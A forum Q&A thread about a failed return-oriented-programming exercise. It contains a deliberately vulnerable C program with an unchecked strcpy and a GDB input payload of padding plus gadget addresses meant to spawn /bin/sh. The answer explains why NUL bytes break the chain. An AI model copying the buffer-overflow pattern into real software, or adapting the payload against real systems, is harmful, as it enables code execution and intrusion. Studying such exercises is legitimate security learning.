Buffer overflow, ROP: the gadget addresses end up in memory without the "\x00" bytes



  • I'm trying to understand return-oriented programming and did everything as in this guide: http://habrahabr.ru/post/255519/ But I ran into a problem:

    I overwrote RIP and wrote the gadget addresses after it, but instead of, for example, the two addresses 0x00007ffff7a58b7d and 0x00007ffff7b2bcd2, when I examine memory after RIP what is recorded there is 0x7ffff7a58b7d7fff and 0x7ffff7b2bcd2 (the first four characters of the next address). That is, the zeros at the beginning went missing, and the addresses shifted by the number of those zeros.

    What is my problem?

    Vulnerable program code:

    #include <string.h>
    #include <stdio.h>

    /* Deliberately vulnerable: strcpy() copies argv[1] into a 50-byte
       buffer with no length check, so a longer argument overflows
       password and everything above it on the stack, up to the saved
       return address (the question reports 72 bytes to reach RIP). */
    int foo(char *bar)
    {
        int loggedin = 0;
        char password[50];
        strcpy(password, bar);
        if (strcmp(password, "secur3") == 0)
        {
            loggedin = 1;
        }
        return loggedin;
    }

    int main(int argc, char **argv)
    {
        if (argc < 2)   /* do not dereference a missing argument */
        {
            return 1;
        }
        if (foo(argv[1]))
        {
            printf("\n\nLoggedin\n\n");
        }
        else
        {
            printf("\n\nLogin Failed!\n\n");
        }
        return 0;
    }

    To overwrite RIP, in my case 72 bytes are required.

    This is what I give GDB as input:

    run $(python -c "print 'A'*72+'\x58\xd8\xa5\xf8\xff\x7f\x00\x00'+
    '\x3b\x00\x00\x00\x00\x00\x00\x00\x00'+'\x7d\x8b\xa5\xf7\xff\x7f\x00\x00'+
    '\x00\x10\x60\x00\x00\x00\x00\x00'+'\xd2\xbc\xb2\xf7\xff\x7f\x00\x00'+
    '\x68\x73\x2f\x6e\x69\x62\x2f'+'\x43\x50\xab\xf7\xff\x7f\x00\x00'+
    '\xd4\xa5\xb4\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+
    '\xe0\x1e\xad\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\xd8\x12\xb1\xf7\xff\x7f\x00\x00'")



  • In the Habr example, all the "hacking" is done where the program receives the injected data, and you are trying to do it through the program's command-line arguments.

    I did a small experiment.

    python -c "print('A'*10+'\x00\x00BB')" >a
    

    In file a, as expected, there was a string of ten 'A's, two zeros and 'BB'. After that I ran:

    echo $(python -c "print('A'*10+'\x00\x00BB')") >a
    

    Everything changed in this command: I passed python's output as a parameter to the echo command, which printed it, and that is what was written to the file. So there are no two zeros in this case. This confirmed my fear that the shell does not, in principle, pass binary zeros through the command line.

    But even if the shell passed them through unchanged, it would help little, because all the C standard library string functions work with strings terminated by a binary 0. That is, strcpy copies the string only up to the first binary zero in it... So either come up with some other vulnerable code that takes the data for the overflow from some other source and does not use string functions to work with it, or manage to build a working chain without zeros, which I think is utopian.
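To make the two effects in this answer concrete, here is an added Python model (not code from the question, the answer, or the Habr article) of what happens to the asker's two gadget addresses when they pass through $(...) substitution and then strcpy(); the NUL-dropping rule and the zero-filled destination are assumptions of the model.

```python
import struct

# The two gadget addresses the asker quotes (taken from the question, not new values).
INTENDED_CHAIN = [0x00007FFFF7A58B7D, 0x00007FFFF7B2BCD2]


def pack_chain(addresses):
    """Little-endian 64-bit words, as the asker's python one-liner emits them."""
    return b"".join(struct.pack("<Q", a) for a in addresses)


def shell_substitution(payload):
    """Assumed model of $(...): the shell drops NUL bytes from the substituted
    text, because an argv entry is a C string and cannot contain a NUL."""
    return payload.replace(b"\x00", b"")


def strcpy_into(dst_size, src):
    """Model of strcpy(): copy up to and including the first NUL, no bounds check.
    The destination is assumed zero-filled beforehand (a real stack holds leftovers)."""
    end = src.find(b"\x00")
    copied = src if end < 0 else src[: end + 1]
    return copied + b"\x00" * max(0, dst_size - len(copied))


def read_qwords(mem, count):
    """What gdb's x/Ngx shows: consecutive 8-byte little-endian words."""
    return [struct.unpack_from("<Q", mem, 8 * i)[0] for i in range(count)]


def via_shell_and_strcpy(chain):
    """Words on the stack after $(...) substitution and then strcpy()."""
    return read_qwords(strcpy_into(16, shell_substitution(pack_chain(chain))), 2)


def via_strcpy_only(chain):
    """Words on the stack if the NULs had survived the shell but strcpy() still ran."""
    return read_qwords(strcpy_into(16, pack_chain(chain)), 2)


if __name__ == "__main__":
    # First case: both words are wrong because every address lost two bytes.
    # Second case: the first address survives only because the destination was
    # zero-filled; the second gadget never arrives at all.
    for label, words in (("shell + strcpy", via_shell_and_strcpy(INTENDED_CHAIN)),
                         ("strcpy only", via_strcpy_only(INTENDED_CHAIN))):
        print(label + ":", ", ".join(hex(w) for w in words))
```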
